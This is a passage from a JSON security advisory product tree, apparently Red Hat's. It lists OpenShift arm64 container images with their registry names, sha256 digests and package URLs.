"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:9a37dc47bb380727304270fb8e508f4e2f638ae70a5c90c055d212bf72368488_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:9a37dc47bb380727304270fb8e508f4e2f638ae70a5c90c055d212bf72368488_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3A9a37dc47bb380727304270fb8e508f4e2f638ae70a5c90c055d212bf72368488?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848743"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:a37e5b31b6b72957a891fc6a9186b33a810109ccbd55e30cfbb4c4eaadb70be4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:a37e5b31b6b72957a891fc6a9186b33a810109ccbd55e30cfbb4c4eaadb70be4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:a37e5b31b6b72957a891fc6a9186b33a810109ccbd55e30cfbb4c4eaadb70be4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-rbac-proxy-rhel9@sha256%3Aa37e5b31b6b72957a891fc6a9186b33a810109ccbd55e30cfbb4c4eaadb70be4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849626"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:fd42f2dec072128bf5f2838c94a1d7c806c76a040e71150671f97c1d82a0276d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:fd42f2dec072128bf5f2838c94a1d7c806c76a040e71150671f97c1d82a0276d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:fd42f2dec072128bf5f2838c94a1d7c806c76a040e71150671f97c1d82a0276d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-state-metrics-rhel9@sha256%3Afd42f2dec072128bf5f2838c94a1d7c806c76a040e71150671f97c1d82a0276d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847270"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6b733ac8700fec7ab2d0c8616014903eea9e5bb58bb03ca83b1deb0e2c3ea9a3_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6b733ac8700fec7ab2d0c8616014903eea9e5bb58bb03ca83b1deb0e2c3ea9a3_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6b733ac8700fec7ab2d0c8616014903eea9e5bb58bb03ca83b1deb0e2c3ea9a3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A6b733ac8700fec7ab2d0c8616014903eea9e5bb58bb03ca83b1deb0e2c3ea9a3?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:7070ef2a6495712f2aa282baf40d7beabd5904b3256993681d573d83e172cbb6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:7070ef2a6495712f2aa282baf40d7beabd5904b3256993681d573d83e172cbb6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:7070ef2a6495712f2aa282baf40d7beabd5904b3256993681d573d83e172cbb6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A7070ef2a6495712f2aa282baf40d7beabd5904b3256993681d573d83e172cbb6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849532"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b87756166b86bc4b21e67c761d6fd90c0117b0cf740874b0c4df3531a4c7a1d2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b87756166b86bc4b21e67c761d6fd90c0117b0cf740874b0c4df3531a4c7a1d2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b87756166b86bc4b21e67c761d6fd90c0117b0cf740874b0c4df3531a4c7a1d2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-rhel9@sha256%3Ab87756166b86bc4b21e67c761d6fd90c0117b0cf740874b0c4df3531a4c7a1d2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:f77c2640a03260c85cdbaac6d50ad464c726bca3f744e3967989d194f46d1892_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:f77c2640a03260c85cdbaac6d50ad464c726bca3f744e3967989d194f46d1892_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:f77c2640a03260c85cdbaac6d50ad464c726bca3f744e3967989d194f46d1892_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-microshift-rhel9@sha256%3Af77c2640a03260c85cdbaac6d50ad464c726bca3f744e3967989d194f46d1892?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849379"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:f34b8488fa14562e7f1849599f0121aa8191f408bb0ea1b3151df11c7c3091ce_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:f34b8488fa14562e7f1849599f0121aa8191f408bb0ea1b3151df11c7c3091ce_arm64",
"product_id": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:f34b8488fa14562e7f1849599f0121aa8191f408bb0ea1b3151df11c7c3091ce_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-networkpolicy-rhel9@sha256%3Af34b8488fa14562e7f1849599f0121aa8191f408bb0ea1b3151df11c7c3091ce?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847787"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:7b1fff7c34072d0d46fe4b45348d6ac3bf755ac0bde3a30f313ffb23a64b764c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:7b1fff7c34072d0d46fe4b45348d6ac3bf755ac0bde3a30f313ffb23a64b764c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:7b1fff7c34072d0d46fe4b45348d6ac3bf755ac0bde3a30f313ffb23a64b764c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-networking-console-plugin-rhel9@sha256%3A7b1fff7c34072d0d46fe4b45348d6ac3bf755ac0bde3a30f313ffb23a64b764c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849485"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:c3a5a723959e11512f7332af7a60f34367a239fcc6572327240d17181b00b9b9_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:c3a5a723959e11512f7332af7a60f34367a239fcc6572327240d17181b00b9b9_arm64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:c3a5a723959e11512f7332af7a60f34367a239fcc6572327240d17181b00b9b9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-server-rhel9@sha256%3Ac3a5a723959e11512f7332af7a60f34367a239fcc6572327240d17181b00b9b9?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849032"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:7c4b7e341a617380ab6f0dd9a1012fdfe9908afd744a2c81cae644538f881602_arm64",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:7c4b7e341a617380ab6f0dd9a1012fdfe9908afd744a2c81cae644538f881602_arm64",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:7c4b7e341a617380ab6f0dd9a1012fdfe9908afd744a2c81cae644538f881602_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3A7c4b7e341a617380ab6f0dd9a1012fdfe9908afd744a2c81cae644538f881602?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846953"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:e683a2939c279d6b694eca7d8591e66459b880eefe3d5ba3312e2ed90e8337e5_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:e683a2939c279d6b694eca7d8591e66459b880eefe3d5ba3312e2ed90e8337e5_arm64",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:e683a2939c279d6b694eca7d8591e66459b880eefe3d5ba3312e2ed90e8337e5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3Ae683a2939c279d6b694eca7d8591e66459b880eefe3d5ba3312e2ed90e8337e5?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844600"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:809e1636777dcaaa79d79c5edb76ff243ca743fa119a4988b3ac8b9222d3ba3f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:809e1636777dcaaa79d79c5edb76ff243ca743fa119a4988b3ac8b9222d3ba3f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:809e1636777dcaaa79d79c5edb76ff243ca743fa119a4988b3ac8b9222d3ba3f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-rhel9@sha256%3A809e1636777dcaaa79d79c5edb76ff243ca743fa119a4988b3ac8b9222d3ba3f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849329"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:f74d2a1cde5b1ad9da59a8ecd9b81f86aae535ec800c116bb3d160fb81961ba4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:f74d2a1cde5b1ad9da59a8ecd9b81f86aae535ec800c116bb3d160fb81961ba4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:f74d2a1cde5b1ad9da59a8ecd9b81f86aae535ec800c116bb3d160fb81961ba4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3Af74d2a1cde5b1ad9da59a8ecd9b81f86aae535ec800c116bb3d160fb81961ba4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849670"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:99fc6f28b728c227ac8fb8b0dce24369168c7c1aa470778953b30e7fb0ecd1dc_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:99fc6f28b728c227ac8fb8b0dce24369168c7c1aa470778953b30e7fb0ecd1dc_arm64",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:99fc6f28b728c227ac8fb8b0dce24369168c7c1aa470778953b30e7fb0ecd1dc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3A99fc6f28b728c227ac8fb8b0dce24369168c7c1aa470778953b30e7fb0ecd1dc?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849553"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:04a546e0d3565c8b6fe8975074b5a4ddf8bb9d2cb76fdc5083d6313e96c4c084_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:04a546e0d3565c8b6fe8975074b5a4ddf8bb9d2cb76fdc5083d6313e96c4c084_arm64",
"product_id": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:04a546e0d3565c8b6fe8975074b5a4ddf8bb9d2cb76fdc5083d6313e96c4c084_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-deployer-rhel9@sha256%3A04a546e0d3565c8b6fe8975074b5a4ddf8bb9d2cb76fdc5083d6313e96c4c084?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850898"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:827cfae8caf3dbc109b7a17cad74a55d9a4b2b037be5da6174a4e0fba36de5d0_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:827cfae8caf3dbc109b7a17cad74a55d9a4b2b037be5da6174a4e0fba36de5d0_arm64",
"product_id": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:827cfae8caf3dbc109b7a17cad74a55d9a4b2b037be5da6174a4e0fba36de5d0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-haproxy-router-rhel9@sha256%3A827cfae8caf3dbc109b7a17cad74a55d9a4b2b037be5da6174a4e0fba36de5d0?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850450"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:18cd11b57cbd5d2a7a277bc8abe8ff6f5f2b663072f9d44994e4093fc986ea39_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:18cd11b57cbd5d2a7a277bc8abe8ff6f5f2b663072f9d44994e4093fc986ea39_arm64",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:18cd11b57cbd5d2a7a277bc8abe8ff6f5f2b663072f9d44994e4093fc986ea39_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3A18cd11b57cbd5d2a7a277bc8abe8ff6f5f2b663072f9d44994e4093fc986ea39?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848413"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:43f06bfcf33a143963b6f2f459e2348977d20639165881d3c94fc50504ff589d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:43f06bfcf33a143963b6f2f459e2348977d20639165881d3c94fc50504ff589d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:43f06bfcf33a143963b6f2f459e2348977d20639165881d3c94fc50504ff589d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3A43f06bfcf33a143963b6f2f459e2348977d20639165881d3c94fc50504ff589d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848686"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:848bdd1bed4275a4ea071b7351cafaed425fab7e82e3b71fb6d31b4a9a61d47a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:848bdd1bed4275a4ea071b7351cafaed425fab7e82e3b71fb6d31b4a9a61d47a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:848bdd1bed4275a4ea071b7351cafaed425fab7e82e3b71fb6d31b4a9a61d47a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3A848bdd1bed4275a4ea071b7351cafaed425fab7e82e3b71fb6d31b4a9a61d47a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849386"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:4bf941cfba094da6cc387b0b24430b60131c812dfb179e8ca0f57e15b4757434_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:4bf941cfba094da6cc387b0b24430b60131c812dfb179e8ca0f57e15b4757434_arm64",
"product_id": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:4bf941cfba094da6cc387b0b24430b60131c812dfb179e8ca0f57e15b4757434_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-registry-rhel9@sha256%3A4bf941cfba094da6cc387b0b24430b60131c812dfb179e8ca0f57e15b4757434?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847640"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:21a29815d5d3fd34632ef852217f63319e3d5fdec795fae749e38d6381c29c15_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:21a29815d5d3fd34632ef852217f63319e3d5fdec795fae749e38d6381c29c15_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:21a29815d5d3fd34632ef852217f63319e3d5fdec795fae749e38d6381c29c15_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-state-metrics-rhel9@sha256%3A21a29815d5d3fd34632ef852217f63319e3d5fdec795fae749e38d6381c29c15?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847832"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:476478ca6f4d476333feb32ad72d78df98357a02dfe1a488d10d6d7aac05e50e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:476478ca6f4d476333feb32ad72d78df98357a02dfe1a488d10d6d7aac05e50e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:476478ca6f4d476333feb32ad72d78df98357a02dfe1a488d10d6d7aac05e50e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cluster-api-controllers-rhel9@sha256%3A476478ca6f4d476333feb32ad72d78df98357a02dfe1a488d10d6d7aac05e50e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846004"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45c1bb0d34fbf71bbd0caa65dc531e67575f34d7322e8d5313583aae4e0e2eab_arm64",
"product": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45c1bb0d34fbf71bbd0caa65dc531e67575f34d7322e8d5313583aae4e0e2eab_arm64",
"product_id": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45c1bb0d34fbf71bbd0caa65dc531e67575f34d7322e8d5313583aae4e0e2eab_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openstack-resource-controller-rhel9@sha256%3A45c1bb0d34fbf71bbd0caa65dc531e67575f34d7322e8d5313583aae4e0e2eab?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848327"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:7973e6e926dce93531a2fce68ceb4f1a08128167b1a92f73ce82bc254e314473_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:7973e6e926dce93531a2fce68ceb4f1a08128167b1a92f73ce82bc254e314473_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:7973e6e926dce93531a2fce68ceb4f1a08128167b1a92f73ce82bc254e314473_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3A7973e6e926dce93531a2fce68ceb4f1a08128167b1a92f73ce82bc254e314473?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848580"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:60c1cde27e89223959f2cbec07a7c1408063814897ad8cc8837ca7051e79952f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:60c1cde27e89223959f2cbec07a7c1408063814897ad8cc8837ca7051e79952f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:60c1cde27e89223959f2cbec07a7c1408063814897ad8cc8837ca7051e79952f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A60c1cde27e89223959f2cbec07a7c1408063814897ad8cc8837ca7051e79952f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:fa8c6beaf4228a8f690b70daef15fdde242c3d196e783deaaf4d3769db488d74_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:fa8c6beaf4228a8f690b70daef15fdde242c3d196e783deaaf4d3769db488d74_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:fa8c6beaf4228a8f690b70daef15fdde242c3d196e783deaaf4d3769db488d74_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-csr-approver-rhel9@sha256%3Afa8c6beaf4228a8f690b70daef15fdde242c3d196e783deaaf4d3769db488d74?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849682"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:caf64d624cc8e698f0d6cbd583ea3d43b64e46da125b6608dfe4072915d68f43_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:caf64d624cc8e698f0d6cbd583ea3d43b64e46da125b6608dfe4072915d68f43_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:caf64d624cc8e698f0d6cbd583ea3d43b64e46da125b6608dfe4072915d68f43_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-node-agent-rhel9@sha256%3Acaf64d624cc8e698f0d6cbd583ea3d43b64e46da125b6608dfe4072915d68f43?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848754"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:fc6d0b64e7e5ccfdec2fa08bab5b2a0d598d2afe6272b593656d8b3c7d9aa725_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:fc6d0b64e7e5ccfdec2fa08bab5b2a0d598d2afe6272b593656d8b3c7d9aa725_arm64",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:fc6d0b64e7e5ccfdec2fa08bab5b2a0d598d2afe6272b593656d8b3c7d9aa725_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-orchestrator-rhel9@sha256%3Afc6d0b64e7e5ccfdec2fa08bab5b2a0d598d2afe6272b593656d8b3c7d9aa725?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848221"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:f5cdce5e8eee1b014ff8a0a12181a3d05d5dbb747e8e4114c18d7c891e97a477_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:f5cdce5e8eee1b014ff8a0a12181a3d05d5dbb747e8e4114c18d7c891e97a477_arm64",
"product_id": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:f5cdce5e8eee1b014ff8a0a12181a3d05d5dbb747e8e4114c18d7c891e97a477_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-apiserver-network-proxy-rhel9@sha256%3Af5cdce5e8eee1b014ff8a0a12181a3d05d5dbb747e8e4114c18d7c891e97a477?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844475"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:7662f86e2f8f23582ae548c70dad5458e37256f9c4cdc401be880e319ef591c2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:7662f86e2f8f23582ae548c70dad5458e37256f9c4cdc401be880e319ef591c2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:7662f86e2f8f23582ae548c70dad5458e37256f9c4cdc401be880e319ef591c2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-cloud-controller-manager-rhel9@sha256%3A7662f86e2f8f23582ae548c70dad5458e37256f9c4cdc401be880e319ef591c2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844630"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:df3552170db05d67f4e75e756495f62164a28bd7468f4093e43f3a7c13bf7682_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:df3552170db05d67f4e75e756495f62164a28bd7468f4093e43f3a7c13bf7682_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:df3552170db05d67f4e75e756495f62164a28bd7468f4093e43f3a7c13bf7682_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-cluster-api-controllers-rhel9@sha256%3Adf3552170db05d67f4e75e756495f62164a28bd7468f4093e43f3a7c13bf7682?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844763"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:83a7a3bb3080d3386eb7fa7debe976a551c272a1d70f31d7cc05a437f175f0c2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:83a7a3bb3080d3386eb7fa7debe976a551c272a1d70f31d7cc05a437f175f0c2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:83a7a3bb3080d3386eb7fa7debe976a551c272a1d70f31d7cc05a437f175f0c2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-ebs-csi-driver-rhel9@sha256%3A83a7a3bb3080d3386eb7fa7debe976a551c272a1d70f31d7cc05a437f175f0c2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844635"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:c7609e999d1c88e83dd99682b5756386c274d506704340d78be73efe9e6f35b1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:c7609e999d1c88e83dd99682b5756386c274d506704340d78be73efe9e6f35b1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:c7609e999d1c88e83dd99682b5756386c274d506704340d78be73efe9e6f35b1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-ebs-csi-driver-rhel9-operator@sha256%3Ac7609e999d1c88e83dd99682b5756386c274d506704340d78be73efe9e6f35b1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844553"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:e9c7cedabf9b749ae2faf9427a229757c3c1c5871054667444168030eab28aab_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:e9c7cedabf9b749ae2faf9427a229757c3c1c5871054667444168030eab28aab_arm64",
"product_id": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:e9c7cedabf9b749ae2faf9427a229757c3c1c5871054667444168030eab28aab_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-aws-pod-identity-webhook-rhel9@sha256%3Ae9c7cedabf9b749ae2faf9427a229757c3c1c5871054667444168030eab28aab?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844591"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f3470dd96c2c29ceef92ea0ab5adfcecead95eba0f1caa1fad96f3fdf50f57c6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f3470dd96c2c29ceef92ea0ab5adfcecead95eba0f1caa1fad96f3fdf50f57c6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f3470dd96c2c29ceef92ea0ab5adfcecead95eba0f1caa1fad96f3fdf50f57c6_arm64",
"product_identification_helper": {
